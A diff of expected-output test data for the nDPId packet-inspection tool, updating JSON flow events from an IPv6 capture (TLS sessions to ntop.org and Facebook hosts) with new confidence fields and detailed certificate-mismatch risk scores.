{"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
+00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269139219,"flow_last_seen":1448269139239,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1448269139239,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
+00937{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269139219,"flow_last_seen":1448269139263,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1448269139263,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
+01390{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269139219,"flow_last_seen":1448269139267,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"ts_msec":1448269139267,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139314,"flow_last_seen":1448269139314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269139314,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1448269139314,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1448269139314,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BoQAAAAAAAA7t6twBuwxnksLpg7gmgBABC+E3AAABAQgKEg134BvnLVo="}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1448269139321,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1448269139321,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOyoCJvAArQGhAAAAAAAADu0qAA1AAAEAA3qswP\/+pw1MAbvq3OmDuCYMZ5LDgBAD0zk\/AAABAQgKG+fdWhINH94="}
@@ -52,9 +52,9 @@
 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1448269144450,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1448269144450,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhUAAAAAoAJwgGsaAAACBAWgBAIIChINfOQAAAAAAQMDBw=="}
 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1448269144475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1448269144475,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSgnjE+S8HnzYWoBJvkOerAAACBAWgBAIICgBesqQSDXzkAQMDCA=="}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1448269144475,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1448269144475,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhZ4xPkwgBAA4WsSAAABAQgKEg186gBesqQ="}
-00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269144450,"flow_last_seen":1448269144475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1448269144475,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
-00912{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269144450,"flow_last_seen":1448269144502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1448269144502,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
-01284{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269144450,"flow_last_seen":1448269144508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"ts_msec":1448269144508,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10":"TLS Certificate Mismatch"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
+00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269144450,"flow_last_seen":1448269144475,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1448269144475,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
+00938{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269144450,"flow_last_seen":1448269144502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"ts_msec":1448269144502,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
+01391{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269144450,"flow_last_seen":1448269144508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"ts_msec":1448269144508,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}}
 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269145458,"flow_last_seen":1448269145458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1448269145458,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1448269145458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1448269145458,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAS6SoBu3aemNPcvXclgBAA6hVxAAABAQgKEg194OPdWG4="}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1448269145478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1448269145478,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBIqAA1AAAEAA3qswP\/+pw1MAbvpKty9dyV2npjUgBAA8BoIAAABAQgK494IbhIM+eU="}
@@ -66,33 +66,33 @@
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z44Bu8SPrfTp+pk3gBAA4dR2AAABAQgKEg1\/Sxvn+wE="}
 00506{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"ts_msec":1448269146912,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOyoCJvAArQGXAAAAAAAAAjYqAA1AAAEAA3qswP\/+pw1MAbvPjOjBmT8LSrsqoBJswEUcAAACBAV8BAIIChvn+wESDX9JAQMDBQ=="}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z4wBuwtKuyrowZlAgBAA4dR2AAABAQgKEg1\/Sxvn+wE="}
-00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
-00874{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
-01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":628,"midstream":0,"ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}}
-00931{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3080,"flow_avg_l4_payload_len":513,"midstream":0,"ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
-01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":471,"midstream":0,"ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}}
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1448269146905,"flow_last_seen":1448269146970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":344,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1448269146905,"flow_last_seen":1448269146966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":413,"midstream":0,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}}
-00630{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00900{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}}
